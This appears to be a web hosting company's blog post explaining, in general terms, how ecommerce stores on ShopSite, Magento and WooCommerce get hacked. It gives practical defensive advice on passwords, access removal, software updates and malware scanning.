Keep Your Ecommerce Store Secure
Keeping your ecommerce store secure from hackers is something every store owner must address on a continual basis. It’s not a “one and done” type of approach. As a web host, we see a lot of compromised accounts and stores. They affect all types of ecommerce solutions such as ShopSite, Magento, and WooCommerce.
We’ll take a look at the type of compromises we see, how hackers are using these break-ins to their advantage, and some simple steps to keeping your online store safe and secure. Follow up posts will address steps to take for specific ecommerce solutions.
Three categories of hacks
For the most part, when an ecommerce store is “hacked” or compromised, it falls into one of three categories:
1. Admin login details obtained through malware on a PC
This is becoming more of an issue these days. Hackers get malware on a computer where the admin password is being typed or is stored insecurely. The malware either logs keystrokes, or harvests any passwords it can find, and passes this information on to the hacker network.
2. Vulnerable or outdated plugins, extensions, or software that hackers compromise
This is the most common type of hacking we see. Store owners running old software that has not been updated and contains a vulnerability that a hacker exploits. Once exploited, the hackers can often upload files, gain admin access, and take over a site/store easily.
3. FTP/ssh credentials obtained through malware on a PC (or insecure wifi)
Another trend that is growing in popularity. FTP passwords are obtained through malware on a PC harvesting stored passwords in FTP programs, and then FTP is used to upload malicious files into a website. We’ve seen people using public wifi and connecting via FTP insecurely get their passwords stolen as well.
What do hackers do?
Once access is gained, hackers can do many things (all of which we have seen) such as:
Download order data to try and obtain sensitive info
Hackers have downloaded data from a store to obtain credit card numbers, customer emails, customer logins, and more.
Edit software files
Edits are made to try and skim credit card data as customers are entering it. We’ve seen some creative hacks which included emailing card data, storing it in an image on the site they download periodically, and using an external JavaScript call to send data offsite, disguised to look like a Google Analytics snippet of code.
Install malware on the website
Why? To spread more malware of course!
Create backdoor admin users or scripts
This allows access in the future for further attacks. This is a common technique.
Send spam/phishing emails through your website
A popular option that is used by hackers who gain access to websites.
How to keep safe
There are a number of steps you can take to minimize this risk:
Use a hard to guess password, change it frequently
This is an easy one to do. Many ecommerce applications allow an unlimited number of attempts to login. If the password is easy to guess, they have a good chance of getting it.
Changing your password frequently is good practice. Maybe you gave the login to someone to help with an issue, or it’s been stored on multiple computers for a while. Keeping the password up to date reduces the risk it could be compromised accidentally.
Do not give out your passwords to just anyone
It’s an obvious one, but think before giving someone access to your store or admin panel. Do they really need that access? Can you create a limited account for them, restricting them to only the options they need to see/edit?
Also try to avoid emailing a password to someone. Email is not always secure, and you have no way to know what the person receiving the email does with that email in terms of keeping it safe.
Remove or change logins once work is done
This is one of the most common points of failure that leads to compromise. A login is created for a developer or third party. Or the main login is given to them. When they are done, the password is not changed, or the login is not removed. Sometime in the future the developer’s computer is compromised by malware, and the attackers now have access to your store.
Please remember to restrict access once work is complete from an outside party.
Do not store passwords insecurely in your computer
Do you save your logins in your web browser? Keep the password stored in an FTP program for easy access? Unless you know that software uses strong encryption or “two factor authentication”, it’s a hotbed for hackers to obtain logins.
Consider using a password management system like Last Pass, 1Password, Keep Pass, and others. This will help secure your passwords. At a minimum, only use Google Chrome while logged into Google and using browser sync to take advantage of their more secure password management service.
Keep software up to date
Make sure your ecommerce software is kept up to date with the latest releases. This applies to the add-ons, plugins, and extensions you have installed as well. If you use other applications on your website like a WordPress blog, keep that up to date to avoid it being an entry point that leads to your ecommerce store being broken into.
To keep up to date, subscribe to your ecommerce company’s newsletter and blog, keep up with industry news related to the applications you use, or ask your developer or web host if you are up to date.
Scan your website for malware
There are many options to have this done. Services such as Sucuri are an option. You can check your Google Search Console (formerly Google Webmaster Tools) account to see if any alerts are posted about your site being compromised.
If you’re hosted with us, we perform a daily malware scan on all files for all clients.
….
Hopefully this helps highlight some simple measures you can put in place to keep your store safe. Look for follow up blog posts on keeping your ShopSite, Magento, and WooCommerce stores secure.
Looking for a web host that understands ecommerce and business hosting?
Check us out today!